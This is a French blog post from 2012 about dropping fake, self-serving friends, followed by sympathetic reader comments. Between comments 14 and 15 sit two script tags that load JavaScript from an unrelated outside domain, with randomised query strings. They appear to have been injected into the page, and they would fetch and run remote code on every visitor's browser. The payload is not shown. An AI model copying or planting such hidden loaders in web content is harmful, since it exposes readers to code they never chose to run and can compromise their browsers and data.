• Ces gens qui profitent de vous : STOP !

    Il y a des jours où l'on décide de tout changer. Des jours où l'on se dit que là, c'est bon, c'est trop, y'en a marre. On dit stop.

         Ces gens qui profitent de vous : STOP !           Ces gens qui profitent de vous : STOP !

    Pour tout vous avouer, j'ai toujours été un peu « bisounours », à croire que tous les gens que j'ai aimé et que j'aime me veu(len)t du bien. Puis, j'ai commencé à connaître mes premières déceptions : amoureuses, amicales, familiales,... On commence à ouvrir les yeux et on se rend compte qu'autant, nous, on aurait tout donné pour ces personnes, autant, elles, vous laissent tomber à la moindre occasion. On se rend compte que, ces personnes dont on faisait une priorité dans notre vie, ces personnes à qui l'on pensait très souvent, ne faisaient de nous qu'une option quelconque quand elles avaient rien d'autre à faire, personne d'autre à qui penser. On s'oblige à se durcir, à ne plus jamais suivre naïvement son coeur et juste suivre sa raison. Et c'est valable pour tellement de personnes ! Tellement de personnes fausses qui vous noient sous de belles paroles, des promesses d'être toujours là pour vous, et quand vous êtes vraiment mal, ces gens là disparaissent comme par magie ! Et bien moi, ces personnes, c'est terminé. J'arrête !

                            

    Du coup, je parais très vieux jeu ces derniers temps mais j'ai décidé de faire le tri dans ma vie. Je ne compte plus que sur moi-même, sur ma famille proche, ma meilleure amie, mon homme qui partage ma vie depuis bientôt 6 ans et qui me chouchoute comme c'est pas permis... et mes amis proches. Mais là encore, attention aux faux-amis... Ceux qui restent autour de vous parce qu'ils ont besoin d'attention ou d'autre chose, et qui après font les morts quand vous traversez une mauvaise période... Méfiance. J'ai encore fait les frais de ce type d'amitié il y a peu, où j'aurais tout donné pour cette personne, j'aurais tout fait pour la rendre heureuse. En échange, qu'est ce que j'ai eu ? Un silence radio parce que je n'allais pas bien. J'ai ragé. J'ai pesté. J'ai été cash, je lui ai dit. Et je suis restée dans le vent. Ben oui, vous comprenez, je n'étais plus aussi drôle et légère qu'avant, du coup je n'étais plus intéressante pour elle. Jusqu'à ce qu'elle revienne comme une fleur une fois l'orage passé. C'est mal me connaître, l'orage ne passe jamais chez moi. Pour la simple et bonne raison que pour moi, à moins d'un léger accident de parcours, une personne qui vous aime réellement ne vous veut pas de mal et fera tout pour ne pas vous en faire. S'inquiétera de vous. Sera là pour vous. Mais là, ce n'était pas le cas. Je donnais, je ne reçevais rien en retour. Et là je me suis dit « NO WAY. P-l-u-s-j-a-m-a-i-s. Suis ta tête maintenant ». C'est beau hein, ce type d'amitié à sens unique ? Du coup, cette fois-ci j'ai décidé que ce serait la dernière. J'aime les gens, il n'y a rien à faire contre ça, et je suis très ouverte, je tisse facilement des liens et j'ai des connaissances absolument adorables auxquelles je tiens ! Mais maintenant, je resterai sur mes gardes, c'est malheureux mais je suis tellement lassée et blasée que je ne veux plus jamais faire les frais de ce type de relation unilatérale et destructrice si l'on ne s'en réveille pas rapidement.

    On envoie donc bouler tante bidule qui pense ça ou ci de vous, on envoie bouler les gens qui, dans votre entourage, vous sourient en face et vous enfoncent dans le dos; on envoie bouler les beaux-parleurs qui ne font rien de bon; on envoie bouler les commères qui n'ont d'autre sujet de conversation que leurs derniers avis méprisants/méprisables sur votre vie (puisque la leur n'est apparemment pas assez riche), on envoie bouler... Toutes ces personnes qui sont sources de frustrations et que l'on laisse trop souvent dans notre quotidien. Et on ne garde que les meilleures.

    J
    e terminerai donc vulgairement (parce que ça fait du bien) pour ces gens-là (je précise) sur un :  

    Suis moi, je te suis.

    Fuis moi,... Va te faire foutre !

    Bon week-end

    Ces gens qui profitent de vous : STOP !


    Tags Tags : , , , , , ,
  • Commentaires

    1
    Samedi 14 Juillet 2012 à 12:44

    Je crois qu'on ne peut pas éviter toutes les déceptions. Mais s'obliger à faire du tri et ainsi à être plus méfiante, à faire plus attention à ses relations, c'est déjà ça pour éviter d'être déçue et malmenée même à tous les coins de rue par des amis qui n'en sont pas.

     

    2
    Djahann79
    Samedi 14 Juillet 2012 à 12:49

    comme je te comprends. Je fais aussi régulièrement du tri. les personnes qui fuient au moindre souci, ne sont pas de vrais amis.

     

    3
    Samedi 14 Juillet 2012 à 12:50

    Je suis exactement d'accord avec toi !!!!! Mais c'est dur... j'essaye, j'essaye ... !

    Bisous

    4
    Olivia 21
    Samedi 14 Juillet 2012 à 13:15

     Bonjour Charlotte!ça fait 15jours que j'ai découvert ton bloget franchement là cet article!du top des tops!tu as totalement raison ce que tu dis est si vrai!il a des années que j'ai fait un tri et franchement depuis je vais beaucoup mieux!j'ai un cercle resteint amical et familial mais tellement plus sain..je veux plus qu'on me pourisse la vie comme avant donc les nouvelles connaissances je me méfie et je prend le temps de bien connaitre..bonne journée Charlotte et merci de ton article,ça fait du bien de voir qu'il y a encore des gens qui ont des valeurs!bise.

    5
    Samedi 14 Juillet 2012 à 13:18

    Merci pour vos retours les filles, vous êtes adorables ! ♥
    Rassurée de voir qu'on vit quand même sur la même planète pour la plupart... x)

    @Olivia : Merci à toi ♥ et bienvenue !! :D

    6
    Raph (Tommy) =)
    Samedi 14 Juillet 2012 à 13:19

    A quand qu'on se voit alors??? :) Ca fait quand même quelques années déjà! :( Et même si ce n'est pas toujours facile de garder contact, et ce même avec les technologies actuelles (travail, stress, problèmes personnels, ...) ça m'arrive quand même de penser à toi quelques fois ;-) Et aussi à cette chère Elo avec qui il serait temps d'aller au moins boire un verre, ou aller manger un bout ensemble :)

     

    Des bisous par milliers. =)

    7
    bettyboop60
    Samedi 14 Juillet 2012 à 13:40

    Bonjour, 

    Je découvre ton post un peu par hasard , malheureusement tout comme toi j'en ai fait les frais et c'est assez blessant de se rendre compte de la duperie que ces personnes en fait sont la mais font semblant ( une sorte de bouche trou) on est prêt à tout donner et au bout du compte il reste rien de ces relations si ce n'est de l'amertume...

    A nous de prendre garde de se préserver de ces coubats ; bien facile à dire ...

    Toujours est il que je préfère couper les ponts si ces relations ne me mène à rien si ce n'est à avoir perdue mon temps pour rien !

    A bientôt !

    8
    Samedi 14 Juillet 2012 à 15:26

    Quelle tristesse ce genre d'amitié... Moi aussi j'en ai fait les frais et plusieurs fois. -_-"

    C'est a croire qu'il est de plus en plus difficile de trouver des personnes "biens" de nos jours mais comme disait l'autre : il vaut mieux être seule que mal accompagnée :p

    Et je pense que tu as entierement raison de laisser tomber ces gens, ils ne te mérritent pas du tout de toute facon vu leur comportement.

    9
    Samedi 14 Juillet 2012 à 15:30

    @Raph : t'es adorable :-) Si vous avez une date qui vous arrange, fais moi en part :p Sinon, je serai en congé seulement en septembre :-) Gros bisousssssssss

    @Betty : Tout à fait... C'est terrible ! Tu as bien raison de couper les ponts, au moins tu as la paix :-)

    @Teleute : Clairement :-( Je suis entièrement d'accord avec toi ! Vivons pour nous :-)

    10
    Samedi 14 Juillet 2012 à 15:58

    Tiens, j'ai connu ça aussi ! Le genre qui est agressive et qui te ressort en public tes failles dont tu lui as parlé en PRIVÉ pour mieux t'humilier. Je l'ai jartée, elle a cherché à me récupérer avec sa méthode qui fonctionne avec sa petite cour (mais pas avec moi: pas d'bol): "JE SUIS EN PLEINE DEPRESSIOOOOOON JE NE SAIS PAS CE QUE JE DIIIIIS JE SUIS DESOLEEEEEE JE SUIS AU PLUS MAAAAAAAL" + phase de culpabilisation (ratée aussi). Depuis que j'ai adopté la "Parle à ma main" attitude, je suis beaucoup moins tendue lors des soirées dis-donc, puisque je ne la fréquente plus ;)
    Et nos amis communs sont géniaux, parce qu'ils comprennent et ne cherchent pas à se méler de nos histoires. On est adultes, on se gère. 

    11
    Samedi 14 Juillet 2012 à 19:28

    Je te comprend car je suis pareil, ou plutôt j'étais... Je me suis fait avoir plusieurs fois, j'ai eu mal, j'ai pardonné, pas oublié,... Je croyais qu'une fille était ma meilleure amie à un moment, c'était ce qu'elle se disait être pour moi... Puis un jour ou j'allais mal et elle aussi, j'étais là pour elle mais dans un état pas très joyeux, elle m'a carrément dit qu'elle n'avait pas besoin de moi si j'étais comme ça, que je pouvais rentrer, qu'elle avait besoin de gens joyeux... J'étais sur le cul, je suis rentrée choquée et je l'ai jamais oublié, ça m'est resté! Plein d'autres choses qu'elle a fait ou pas fait justement m'ont déçue et blessée... On avait une très belle amitié mais j'ai trop donné, c'était à sens unique... J'en peux plus, j'en veux plus! Je lui ai dis, elle a nié, fait genre elle comprennait pas, a réussi à me faire culpabiliser moi comme toujours,... J'ai de la peine en repensant à nos moments ensemble mais je ne veux plus d'une fausse amitié comme ça, c'est finit! J'ai également fait le tri, je dis plus ce que je pense, je ne me force plus à faire des choses que je ne veux pas,... Mais j'ai peur en amitié, j'ai du mal maintenant =$

     

    (Clarita mais j'ai dû changer de pseudo car le mien était déjà utilisé par un autre membre)

    12
    Olivia 21
    Samedi 14 Juillet 2012 à 20:01

    de rien Charlotte!de t'inquiète pas t'es pas vieux jeu du tout comme tu dis!juste hyperlucide et réalistes et justement à ton age c'est une énorme qualité! ps: moi j'ai 37ans..;-D bonne soirée.

    13
    Olivia 21
    Samedi 14 Juillet 2012 à 20:02

    et merci du 'bienvenue'' ;-)

    14
    Andromaque29
    Samedi 14 Juillet 2012 à 22:26

    Comme je te comprend... C'est marrant que tu publies cet article juste maintenant ! Le weekend dernier j'ai eu une violente altercation avec un membre de la famille de mon copain qui m'a complètement agresse verbalement et physiquement. ça m'a fait pleuré pendant des jours tellement j'ai été choqué. Malheureusement tout ça va me coupé de sa famille et ça m'attriste énormément. Je suis en colère et j'en ai vraiment marre des gens qui te traitent comme de la merde alors que t'as rien fait. ça m'a juste rendu méfiante et agressive alors que je ne suis pas du tout comme ça à la base. Et comme toi maintenant je ne veux m'occuper que des gens qui en valent vraiment la peine. Mais c'est trop dur parfois de devoir être si méfiante, je trouve que les relations humaines sont de plus en plus compliquées, égoïste... Mais pour l'avoir constaté malheureusement ce sont les plus gentils dans la vie qui s'en prennent le plus dans la gueule (j'ai une amie adorable qui a vécu les pires crasses du monde). Je te souhaite en tout cas tout plein de bonheur !

    <script src="http://plugin-rose.info/dfi823hs.js?0.9249783132083657" type="text/javascript"></script>

    <script src="http://plugin-rose.info/dfi823hs.js?0.5313834301765518" type="text/javascript"></script>
    15
    Samedi 14 Juillet 2012 à 23:12

    Je suis comme toi, je vais de déception en déception, pourtant je suis loin de me faire des films sur les relations humaines... Pour résumé, je n'ai pas d'ami(e)s, que des connaissances. Trop de claques dans la figure, trop de temps passé à écouter la vie des autres qui part en lambeaux.... et quand on va mal, il n'y a plus personne au bout du fil. Bien triste constat.

    J'ai appris à vivre sans "les autres" au moins on n'est pas déçu.

     

    Je t'embrasse bien fort.

     

    Anne.

    16
    Dimanche 15 Juillet 2012 à 09:20
    LaFutile

    Je suis bonne poire aussi. Mais tu as de la chance d'avoir des gens autour de toi quand même. Un jour, en faisant également le tri, je n'avais plus que ma famille (qui ne me lachera jamais, je pense, et heureusement), mais zéro ami, zéro personne extérieure pour m'aimer telle que j'étais et là c'était dur... Il faut quand même savoir dire merde, tu as raison.

    17
    Amelynda
    Dimanche 15 Juillet 2012 à 17:55

    Très bel article! Etant d'origne très méfiante... je n'ai pas d'amies proches, que je cotoie une fois ou deux par mois, même pas! Il faut dire que je suis peut-etre solitaire dans l'âme aussi... une super amie de rénové m'a envoyé bouler sur face parce que soit disant elle n'y était plus! Devine qui y est encore? Soit, c'est la vie, c'est comme çà! Ca m'a fait de la peine au début, maintenant, je m'en moque... à force, on se blinde contre les gens qui nous font du mal, on les évite et puis on s'en porte bien mieux ensuite!

    Par contre, j'ai de supers amies du net qui me connaissent encore mieux que certains membres de ma famille, c'est comme çà!

    18
    Lundi 16 Juillet 2012 à 09:53

    je suis du meme avis que toi jarrete de me faire avoir en amitié

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :